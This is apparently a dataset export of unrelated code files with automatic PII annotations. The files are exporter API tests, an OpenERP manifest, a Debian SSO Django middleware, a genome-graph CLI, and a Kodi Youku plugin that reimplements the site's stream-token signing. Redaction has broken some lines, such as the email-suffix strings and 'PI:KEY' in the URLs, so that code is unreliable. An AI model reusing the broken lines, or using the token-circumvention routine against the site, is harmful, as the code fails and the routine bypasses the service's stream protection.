headers=headers_without_content_type) + + assert await resp.json() == {'status': 'running'} + await _wait_job_finish(client, headers_without_content_type) + + async def test_exporter_get_done(self, init_db, headers_without_content_type, headers, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + + await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type) + + assert await resp.json() == { + 'status': 'done', + 'result': {'length': 1, 'max_sells': 1, 'min_sells': 1}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_exporter_get_with_error( + self, init_db, 
headers_without_content_type, headers, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch, []) + await client.post('/engine_objects/1/export', headers=headers_without_content_type) + + resp = await _wait_job_finish(client, headers_without_content_type) + + assert await resp.json() == { + 'status': 'error', + 'result': { + 'message': ""No data found for engine object 'Top Seller Object'"", + 'name': 'EngineError' + }, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + +def CoroMock(): + coro = mock.MagicMock(name=""CoroutineResult"") + corofunc = mock.MagicMock(name=""CoroutineFunction"", side_effect=asyncio.coroutine(coro)) + corofunc.coro = coro + return corofunc + + +def set_data_importer_patch(monkeypatch, mock_=None): + if mock_ is None: + mock_ = mock.MagicMock() + + monkeypatch.setattr('tests.integration.fixtures.TopSellerArrayTest.get_data', mock_) + return mock_ + + +class TestEngineObjectsModelsObjectsExporterWithImport(object): + + async def test_exporter_post_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + get_data_patch = set_data_importer_patch(monkeypatch) + get_data_patch.return_value = {} + + resp = await client.post('/engine_objects/1/export?import_data=true', + headers=headers_without_content_type) + hash_ = await resp.json() + + await _wait_job_finish(client, headers_without_content_type) + + called = bool(TopSellerArrayTest.get_data.called) + TopSellerArrayTest.get_data.reset_mock() + + assert hash_ == {'job_hash': '6342e10bd7dca3240c698aa79c98362e'} + assert called + + async def test_exporter_get_running_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + def func(x, y, z): + sleep(1) + return {} + + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + set_data_importer_patch(monkeypatch, func) + await client.post('/engine_objects/1/export?import_data=true', + headers=headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', + headers=headers_without_content_type) + + assert await resp.json() == {'status': 'running'} + await _wait_job_finish(client, headers_without_content_type) + + async def test_exporter_get_done_with_import(self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch) + await client.post('/engine_objects/1/export?import_data=true', + headers=headers_without_content_type) + + await _wait_job_finish(client, headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', + headers=headers_without_content_type) + + assert await resp.json() == { + 'status': 'done', + 'result': { + 'importer': {'lines_count': 3}, + 'exporter': { + 'length': 1, + 'max_sells': 1, + 'min_sells': 1 + } + }, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_exporter_get_with_error_in_import_with_import( + self, init_db, 
headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + get_data_patch = set_data_importer_patch(monkeypatch) + get_data_patch.side_effect = Exception('testing') + await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type) + + await _wait_job_finish(client, headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', headers=headers_without_content_type) + + assert await resp.json() == { + 'status': 'error', + 'result': {'message': 'testing', 'name': 'Exception'}, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } + + async def test_exporter_get_with_error_in_export_with_import( + self, init_db, headers, headers_without_content_type, client, monkeypatch): + set_patches(monkeypatch) + client = await client + await _post_products(client, headers, headers_without_content_type) + + set_readers_builders_patch(monkeypatch, []) + await client.post('/engine_objects/1/export?import_data=true', headers=headers_without_content_type) + + await _wait_job_finish(client, headers_without_content_type) + + resp = await client.get( + '/engine_objects/1/export?PI:KEY', headers=headers_without_content_type) + + assert await resp.json() == { + 'status': 'error', + 'result': { + 'message': ""No data found for engine object 'Top Seller Object'"", + 'name': 'EngineError' + }, + 'time_info': { + 'elapsed': '0:00', + 'start': '1900-01-01 00:00', + 'end': '1900-01-01 00:00' + } + } +",26915,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016'], ['PERSON', 'Diogo Dutra'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'engine_object'], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'data='], ['PERSON', 'test_delete_valid(self'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['NRP', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['LOCATION', 'set_data_importer_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['PERSON', 'set_readers_builders_patch(monkeypatch'], ['DATE_TIME', ""1900-01-01 00:00'""], ['DATE_TIME', ""1900-01-01 00:00'""], ['URL', 'email.com'], ['URL', 'swaggerit.mo'], ['URL', 'tests.integration.fi'], ['URL', 'pytest.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tests.integration.fi'], ['URL', 'session.loop.ru'], ['URL', 'session.loop.ru'], ['URL', 'tmp.na'], ['URL', 'tmp.cl'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'tests.integration.fi'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 
'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.pa'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'tests.integration.fi'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'client.de'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'resp.st'], ['URL', 'mock.Ma'], ['URL', '.now.re'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'meta.random.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'swaggerit.mo'], ['URL', 'resp.st'], ['URL', 'client.ge'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'mock.Ma'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'client.ge'], ['URL', 'mock.Ma'], ['URL', 'mock.Ma'], ['URL', 'asyncio.co'], ['URL', 'corofunc.co'], ['URL', 'mock.Ma'], ['URL', 'monkeypatch.se'], ['URL', 'tests.integration.fixtures.TopSellerArrayTest.ge'], ['URL', 'patch.re'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.ca'], ['URL', 'TopSellerArrayTest.ge'], ['URL', 'data.re'], ['URL', 'client.ge'], ['URL', 'client.ge'], ['URL', 'patch.si'], ['URL', 'client.ge'], ['URL', 'client.ge']]" +36,"# -*- encoding: utf-8 -*- +# +# Module Written for OpenERP, Open Source Management Solution +# +# Copyright (c) 2014 Vauxoo - http://www.vauxoo.com/ +# All Rights Reserved. +# info Vauxoo (dummy@email.com) +# +# Coded by: Vauxoo (dummy@email.com) +# +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Affero General Public License as +# published by the Free Software Foundation, either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Affero General Public License for more details. +# +# You should have received a copy of the GNU Affero General Public License +# along with this program. If not, see . +# + +{ + 'name': 'Runbot sync remote info', + 'category': 'Website', + 'summary': 'Runbot', + 'version': '1.0', + 'description': """"""This module creates a connection with + the remote git host to sync information, + e.g. the status of a pull request, + e.g. the name of the source branch of a pull request"""""", + 'author': 'Vauxoo', + 'depends': ['runbot'], + 'external_dependencies': { + }, + 'data': [ + 'data/ir_cron_data.xml', + 'view/runbot_view.xml', + ], + 'installable': True, +} +",1491,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Runbot'], ['PERSON', 'Runbot'], ['PERSON', 'runbot'], ['URL', 'http://www.vauxoo.com/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com']]" +37,"# Copyright 2013 The Distro Tracker Developers +# See the COPYRIGHT file at the top-level directory of this distribution and +# at http://deb.li/DTAuthors +# +# This file is part of Distro Tracker. It is subject to the license terms +# in the LICENSE file found in the top-level directory of this +# distribution and at http://deb.li/DTLicense. No part of Distro Tracker, +# including this file, may be copied, modified, propagated, or distributed +# except according to the terms contained in the LICENSE file.
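+# A middleware/backend pair like the one defined below is typically enabled +# through Django settings; a minimal sketch (module paths hypothetical, +# Django 1.x conventions): +# MIDDLEWARE_CLASSES += ('pts.accounts.middleware.DebianSsoUserMiddleware',) +# AUTHENTICATION_BACKENDS = ('pts.accounts.backends.DebianSsoUserBackend',)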
+ +from __future__ import unicode_literals +from django.contrib.auth.middleware import RemoteUserMiddleware +from django.contrib.auth.backends import RemoteUserBackend +from django.contrib import auth +from pts.accounts.models import UserEmail +from pts.core.utils import get_or_none +from pts.accounts.models import User + +import ldap + + +class DebianSsoUserMiddleware(RemoteUserMiddleware): + """""" + Middleware that initiates user authentication based on the REMOTE_USER + field provided by Debian's SSO system. + + If the currently logged in user is a DD (as identified by having a @debian.org + address), he is forcefully logged out if the header is no longer found or is + invalid. + """""" + header = 'REMOTE_USER' + + def extract_email(self, username): + parts = [part for part in username.split(':') if part] + federation, jurisdiction = parts[:2] + if (federation, jurisdiction) != ('DEBIANORG', 'DEBIAN'): + return + + return parts[-1] + dummy@email.com' + + def is_debian_user(self, user): + return any( + email.email.endswith(dummy@email.com') + for email in user.emails.all() + ) + + def log_out_user(self, request): + if request.user.is_authenticated(): + if self.is_debian_user(request.user): + auth.logout(request) + + def process_request(self, request): + if self.header not in request.META: + # If a user is logged in to the PTS by Debian SSO, sign him out + self.log_out_user(request) + return + + username = request.META[self.header] + if not username: + self.log_out_user(request) + return + email = self.extract_email(username) + + if request.user.is_authenticated(): + if request.user.emails.filter(email=email).exists(): + # The currently logged in user matches the one given by the + # headers. + return + + user = auth.authenticate(remote_user=email) + if user: + request.user = user + auth.login(request, user) + + +class DebianSsoUserBackend(RemoteUserBackend): + """""" + The authentication backend which authenticates the provided remote user + (identified by his @debian.org email) in the PTS. If a matching User + model instance does not exist, one is automatically created. In that case + the DD's first and last name are pulled from Debian's LDAP. + """""" + def authenticate(self, remote_user): + if not remote_user: + return + + email = remote_user + + email_user = get_or_none(UserEmail, email=email) + if not email_user: + names = self.get_user_details(remote_user) + kwargs = {} + if names: + kwargs.update(names) + user = User.objects.create_user(main_email=email, **kwargs) + else: + user = email_user.user + + return user + + def get_uid(self, remote_user): + # Strips off the @debian.org part of the email leaving the uid + return remote_user[:-11] + + def get_user_details(self, remote_user): + """""" + Gets the details of the given user from the Debian LDAP. + :return: Dict with the keys ``first_name`` and ``last_name``, or + ``None`` if the LDAP lookup did not return anything.
+ """""" + l = ldap.initialize('ldap://db.debian.org') + result_set = l.search_s( + 'dc=debian,dc=org', + ldap.SCOPE_SUBTREE, + 'uid={}'.format(self.get_uid(remote_user)), + None) + if not result_set: + return None + + result = result_set[0] + return { + 'first_name': result[1]['cn'][0].decode('utf-8'), + 'last_name': result[1]['sn'][0].decode('utf-8'), + } + + def get_user(self, user_id): + try: + return User.objects.get(pk=user_id) + except User.DoesNotExist: + return None +",4455,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2013'], ['PERSON', 'ldap'], ['PERSON', 'REMOTE_USER'], ['LOCATION', 'remote_user'], ['LOCATION', 'remote_user'], ['PERSON', 'remote_user'], ['PERSON', ""dc=org'""], ['LOCATION', 'ldap'], ['URL', 'http://deb.li/DTAuthors'], ['URL', 'http://deb.li/DTLicense.'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.auth.ba'], ['URL', 'django.co'], ['URL', 'pts.accounts.mo'], ['URL', 'pts.co'], ['URL', 'pts.accounts.mo'], ['URL', 'debian.org'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'user.emails.al'], ['URL', 'request.user.is'], ['URL', 'self.is'], ['URL', 'request.us'], ['URL', 'request.ME'], ['URL', 'request.ME'], ['URL', 'request.user.is'], ['URL', 'request.user.emails.fi'], ['URL', 'auth.au'], ['URL', 'request.us'], ['URL', 'debian.org'], ['URL', 'self.ge'], ['URL', 'User.objects.cr'], ['URL', 'user.us'], ['URL', 'debian.org'], ['URL', 'ldap.in'], ['URL', 'db.debian.org'], ['URL', 'l.se'], ['URL', 'ldap.SC'], ['URL', 'self.ge'], ['URL', 'User.objects.ge'], ['URL', 'User.Do']]" +38,"#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# (c) Camille Scott, 2019 +# File : cdbg_stream.py +# License: MIT +# Author : Camille Scott dummy@email.com +# Date : 11.03.2020 + +from goetia import libgoetia + +from goetia.cdbg import (compute_connected_component_callback, + compute_unitig_fragmentation_callback, + write_cdbg_metrics_callback, + write_cdbg_callback) +from goetia.dbg import get_graph_args, process_graph_args +from goetia.parsing import get_fastx_args, iter_fastx_inputs +from goetia.processors import AsyncSequenceProcessor, at_modulo_interval +from goetia.messages import (Interval, SampleStarted, SampleFinished, Error, AllMessages) +from goetia.metadata import CUR_TIME +from goetia.serialization import cDBGSerialization + +from goetia.cli.args import get_output_interval_args, print_interval_settings +from goetia.cli.runner import CommandRunner + +import curio + +import os +import sys + + +class cDBGRunner(CommandRunner): + + def __init__(self, parser): + get_graph_args(parser) + get_cdbg_args(parser) + get_output_interval_args(parser) + + group = get_fastx_args(parser) + group.add_argument('-o', dest='output_filename', default='/dev/stdout') + group.add_argument('-i', '--inputs', dest='inputs', nargs='+', required=True) + + parser.add_argument('--echo', default=None, + help='echo all events to the given file.') + parser.add_argument('--curio-monitor', default=False, action='store_true', + help='Run curio kernel monitor for async debugging.') + parser.add_argument('--verbose', default=False, action='store_true') + + super().__init__(parser) + + def postprocess_args(self, args): + process_graph_args(args) + process_cdbg_args(args) + + def setup(self, args): + os.makedirs(args.results_dir, exist_ok=True) + + self.dbg_t = args.graph_t + self.hasher = args.hasher_t(args.ksize) + self.storage = args.storage.build(*args.storage_args) + self.dbg = args.graph_t.build(self.storage, self.hasher) + + self.cdbg_t = 
libgoetia.cdbg.cDBG[type(self.dbg)] + + self.compactor_t = libgoetia.cdbg.StreamingCompactor[type(self.dbg)] + + self.compactor = self.compactor_t.Compactor.build(self.dbg) + + if args.normalize: + self.file_processor = self.compactor_t.NormalizingCompactor[FastxReader].build(self.compactor, + args.normalize, + args.interval) + else: + self.file_processor = self.compactor_t.Processor.build(self.compactor, + args.interval) + + # Iterator over samples (pairs or singles, depending on pairing-mode) + sample_iter = iter_fastx_inputs(args.inputs, args.pairing_mode, names=args.names) + # AsyncSequenceProcessor does event management and callback for the FileProcessors + self.processor = AsyncSequenceProcessor(self.file_processor, sample_iter, args.echo) + # Subscribe a listener to the FileProcessor producer + self.worker_listener = self.processor.add_listener('worker_q', 'cdbg.consumer') + + # + # Register callbacks for data outputs. + # Track a list of files that need to be closed with a ] + # when we're done. + # + self.to_close = [] + + if args.track_cdbg_metrics: + self.worker_listener.on_message(Interval, + write_cdbg_metrics_callback, + self.compactor, + args.track_cdbg_metrics, + args.verbose) + self.to_close.append(args.track_cdbg_metrics) + + + if args.track_unitig_bp: + if args.unitig_bp_bins is None: + bins = [args.ksize, 100, 200, 500, 1000] + else: + bins = args.unitig_bp_bins + + self.worker_listener.on_message(Interval, + at_modulo_interval(compute_unitig_fragmentation_callback, + modulus=args.unitig_bp_tick), + self.cdbg_t, + self.compactor.cdbg, + args.track_unitig_bp, + bins, + verbose=args.verbose) + self.to_close.append(args.track_unitig_bp) + + + if args.track_cdbg_components: + self.worker_listener.on_message(Interval, + at_modulo_interval(compute_connected_component_callback, + modulus=args.cdbg_components_tick), + self.cdbg_t, + self.compactor.cdbg, + args.track_cdbg_components, + args.component_sample_size, + verbose=args.verbose) + self.to_close.append(args.track_cdbg_components) + + if args.save_cdbg: + for cdbg_format in args.save_cdbg_format: + self.worker_listener.on_message(Interval, + at_modulo_interval(write_cdbg_callback, + modulus=args.cdbg_tick), + args.save_cdbg, + cdbg_format, + verbose=args.verbose) + self.worker_listener.on_message(SampleFinished, + write_cdbg_callback, + args.save_cdbg, + cdbg_format, + verbose=args.verbose) + + # Close all files when done + async def close_files(msg, files): + for file_name in files: + async with curio.aopen(file_name, 'a') as fp: + await fp.write('\n]\n') + + self.worker_listener.on_message(SampleFinished, close_files, self.to_close) + + # + # Regular diagnostics output + # + + def info_output(msg): + info = f'{msg.msg_type}: {getattr(msg, ""state"", """")}'\ + f'\n\tSample: {msg.sample_name}'\ + f'\n\tSequences: {msg.sequence}'\ + f'\n\tk-mers: {msg.t}' + if msg.msg_type == 'Error': + info += f'\n\tError: {msg.error}' + + print(info, file=sys.stderr) + + self.worker_listener.on_message(AllMessages, info_output) + + def execute(self, args): + curio.run(self.processor.start, with_monitor=args.curio_monitor) + + def teardown(self): + pass + + +def get_cdbg_args(parser): + default_prefix = 'goetia.build-cdbg.' 
+ CUR_TIME + parser.default_prefix = default_prefix + group = parser.add_argument_group('cDBG') + + group.add_argument('--results-dir', + default=default_prefix) + + group.add_argument('--normalize', + type=int, + nargs='?', + const=10) + + group.add_argument('--save-cdbg', + metavar='PREFIX.', + nargs='?', + const='goetia.cdbg.graph', + help='Save a copy of the cDBG.') + group.add_argument('--save-cdbg-format', + nargs='+', + choices=cDBGSerialization.FORMATS, + default=['gfa1']) + group.add_argument('--cdbg-tick', + type=int, + default=10, + help='Save every N interval ticks.') + + group.add_argument('--track-cdbg-metrics', + metavar='FILE_NAME.json', + nargs='?', + const='goetia.cdbg.stats.json', + help='Output basic cDBG metrics.') + group.add_argument('--cdbg-metrics-tick', + type=int, + default=5, + help='Output every N interval ticks.') + + group.add_argument('--track-cdbg-components', + metavar='FILE_NAME.json', + nargs='?', + const='goetia.cdbg.components.json', + help='Save the distribution of component sizes.') + group.add_argument('--component-sample-size', + type=int, + default=10000, + help='Number of components to sample for size.') + group.add_argument('--cdbg-components-tick', + type=int, + default=5, + help='Sample and save distribution every N interval ticks.') + + group.add_argument('--track-unitig-bp', + metavar='FILENAME.json', + nargs='?', + const='goetia.cdbg.unitigs.bp.json', + help='Track the distribution of unitig sizes.') + group.add_argument('--unitig-bp-bins', + nargs='+', + type=int, + help='Bin sizes of distribution.') + group.add_argument('--unitig-bp-tick', + type=int, + default=10) + + group.add_argument('--validate', + metavar='FILENAME.csv', + nargs='?', + const='goetia.cdbg.validation.csv') + + return group + + +def process_cdbg_args(args): + + def join(p): + return p if p is None else os.path.join(args.results_dir, p) + + args.track_cdbg_stats = join(args.track_cdbg_metrics) + args.track_cdbg_components = join(args.track_cdbg_components) + args.save_cdbg = join(args.save_cdbg) + args.track_cdbg_unitig_bp = join(args.track_unitig_bp) + + +def print_cdbg_args(args): + print('* cDBG Params', file=sys.stderr) + print('* Directory: ', args.results_dir, file=sys.stderr) + if args.save_cdbg: + print('* Saving cDBG every {0} sequences with file prefix {1}'.format(args.coarse_interval, + args.save_cdbg), + file=sys.stderr) + print('* cDBG save formats: {0}'.format(', '.join(args.save_cdbg_format))) + if args.track_cdbg_stats: + print('* Tracking cDBG stats and reporting every {0} sequences'.format(args.fine_interval), + file=sys.stderr) + print('* Saving tracking information to', args.track_cdbg_stats, file=sys.stderr) + if args.track_cdbg_history: + print('* Tracking cDBG history and saving to', args.track_cdbg_history, file=sys.stderr) + if args.validate: + print('* cDBG will be validated on completion and results saved to', args.validate, + file=sys.stderr) + print('*', '*' * 10, '*', sep='\n', file=sys.stderr) + + +",11564,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '11.03.2020'], ['PERSON', 'Camille Scott'], ['DATE_TIME', '2019'], ['PERSON', 'Camille Scott'], ['LOCATION', 'goetia.messages'], ['PERSON', 'get_fastx_args(parser'], ['PERSON', 'exist_ok=True'], ['LOCATION', 'sample_iter'], ['PERSON', 'self.to_close'], ['PERSON', 'with_monitor=args.curio_monitor'], ['PERSON', ""const='goetia.cdbg.stats.json""], ['PERSON', ""help='Output""], ['PERSON', ""help='Output""], ['PERSON', ""help='Bin""], ['PERSON', ""const='goetia.cdbg.validation.csv""], 
['LOCATION', 'join(args.track_unitig_bp'], ['URL', 'stream.py'], ['URL', 'email.com'], ['URL', 'goetia.cd'], ['URL', 'goetia.pa'], ['URL', 'goetia.pro'], ['URL', 'goetia.me'], ['URL', 'goetia.me'], ['URL', 'goetia.se'], ['URL', 'goetia.cli.ar'], ['URL', 'goetia.cli.ru'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ma'], ['URL', 'args.re'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'args.st'], ['URL', 'args.st'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'self.cd'], ['URL', 'libgoetia.cdbg.cD'], ['URL', 'self.com'], ['URL', 'libgoetia.cdbg.St'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 't.Com'], ['URL', 'args.no'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.No'], ['URL', 'self.com'], ['URL', 'args.no'], ['URL', 'args.int'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.Pro'], ['URL', 'self.com'], ['URL', 'args.int'], ['URL', 'args.in'], ['URL', 'args.pa'], ['URL', 'args.na'], ['URL', 'self.pro'], ['URL', 'self.fi'], ['URL', 'args.ec'], ['URL', 'self.processor.ad'], ['URL', 'cdbg.co'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'self.com'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.cd'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.com'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.cd'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'curio.ao'], ['URL', 'self.to'], ['URL', 'msg.ms'], ['URL', 'msg.sa'], ['URL', 'msg.se'], ['URL', 'msg.ms'], ['URL', 'msg.er'], ['URL', 'sys.st'], ['URL', 'curio.ru'], ['URL', 'self.processor.st'], ['URL', 'args.cu'], ['URL', 'parser.de'], ['URL', 'parser.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.gr'], ['URL', 'group.ad'], ['URL', 'cDBGSerialization.FO'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.st'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.com'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cd'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.va'], ['URL', 'os.path.jo'], ['URL', 'args.re'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.re'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.co'], ['URL', 'args.sa'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.fi'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.va'], ['URL', 'args.va'], ['URL', 'sys.st'], ['URL', 'sys.st']]" +39,"# -*- coding: utf-8 -*- +import xbmc, xbmcgui, xbmcplugin, xbmcaddon, urllib2, urllib, re, string, sys, os, gzip, StringIO, math, urlparse +import base64, time, cookielib +import simplejson + +# Plugin constants +__addon__ = xbmcaddon.Addon() +__addonname__ = __addon__.getAddonInfo('name') +__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode(""utf-8"") + +UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' +ORDER_LIST1 = [['1','最多播放'], 
['2','最多评论'], ['4','最受欢迎'], ['5','最近上映'], ['6','最近更新']] +DAYS_LIST1 = [['1','今日'], ['2','本周'], ['4','历史']] +ORDER_LIST2 = [['1','最多播放'], ['2','最新发布'], ['3','最多评论'], ['4','最多收藏'], ['5','最受欢迎']] +DAYS_LIST2 = [['1','今日'], ['2','本周'], ['3','本月'], ['4','历史']] + +class youkuDecoder: + def __init__( self ): + return + + def getFileIDMixString(self,seed): + mixed = [] + source = list(""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\:._-1234567890"") + seed = float(seed) + for i in range(len(source)): + seed = (seed * 211 + 30031 ) % 65536 + index = math.floor(seed /65536 *len(source)) + mixed.append(source[int(index)]) + source.remove(source[int(index)]) + return mixed + + def getFileId(self,fileId,seed): + mixed = self.getFileIDMixString(seed) + ids = fileId.split('*') + realId = [] + for i in range(0,len(ids)-1): + realId.append(mixed[int(ids[i])]) + return ''.join(realId) + + def trans_e(self, a, c): + b = range(256) + f = 0 + result = '' + h = 0 + while h < 256: + f = (f + b[h] + ord(a[h % len(a)])) % 256 + b[h], b[f] = b[f], b[h] + h += 1 + q = f = h = 0 + while q < len(c): + h = (h + 1) % 256 + f = (f + b[h]) % 256 + b[h], b[f] = b[f], b[h] + result += chr(ord(c[q]) ^ b[(b[h] + b[f]) % 256]) + q += 1 + return result + + def trans_f(self, a, c): + """""" + :argument a: list + :param c: + :return: + """""" + b = [] + for f in range(len(a)): + i = ord(a[f][0]) - 97 if ""a"" <= a[f] <= ""z"" else int(a[f]) + 26 + e = 0 + while e < 36: + if c[e] == i: + i = e + break + e += 1 + v = i - 26 if i > 25 else chr(i + 97) + b.append(str(v)) + return ''.join(b) + + f_code_1 = 'becaf9be' + f_code_2 = 'bf7e5f01' + + def _calc_ep(self, sid, fileId, token): + ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, fileId, token)) + return base64.b64encode(ep) + + def _calc_ep2(self, vid, ep): + e_code = self.trans_e(self.f_code_1, base64.b64decode(ep)) + sid, token = e_code.split('_') + new_ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, vid, token)) + return base64.b64encode(new_ep), token, sid + + def get_sid(self, ep): + e_code = self.trans_e(self.f_code_1, base64.b64decode(ep)) + return e_code.split('_') + + def generate_ep(self, no, fileid, sid, token): + ep = urllib.quote(self._calc_ep(sid, fileid, token).encode('latin1'), + safe=""~()*!.'"" + ) + return ep + +def log(txt): + message = '%s: %s' % (__addonname__, txt) + xbmc.log(msg=message, level=xbmc.LOGDEBUG) + +def GetHttpData(url, referer=''): + log(""%s::url - %s"" % (sys._getframe().f_code.co_name, url)) + req = urllib2.Request(url) + req.add_header('User-Agent', UserAgent) + if referer: + req.add_header('Referer', referer) + try: + response = urllib2.urlopen(req) + httpdata = response.read() + if response.headers.get('content-encoding', None) == 'gzip': + httpdata = 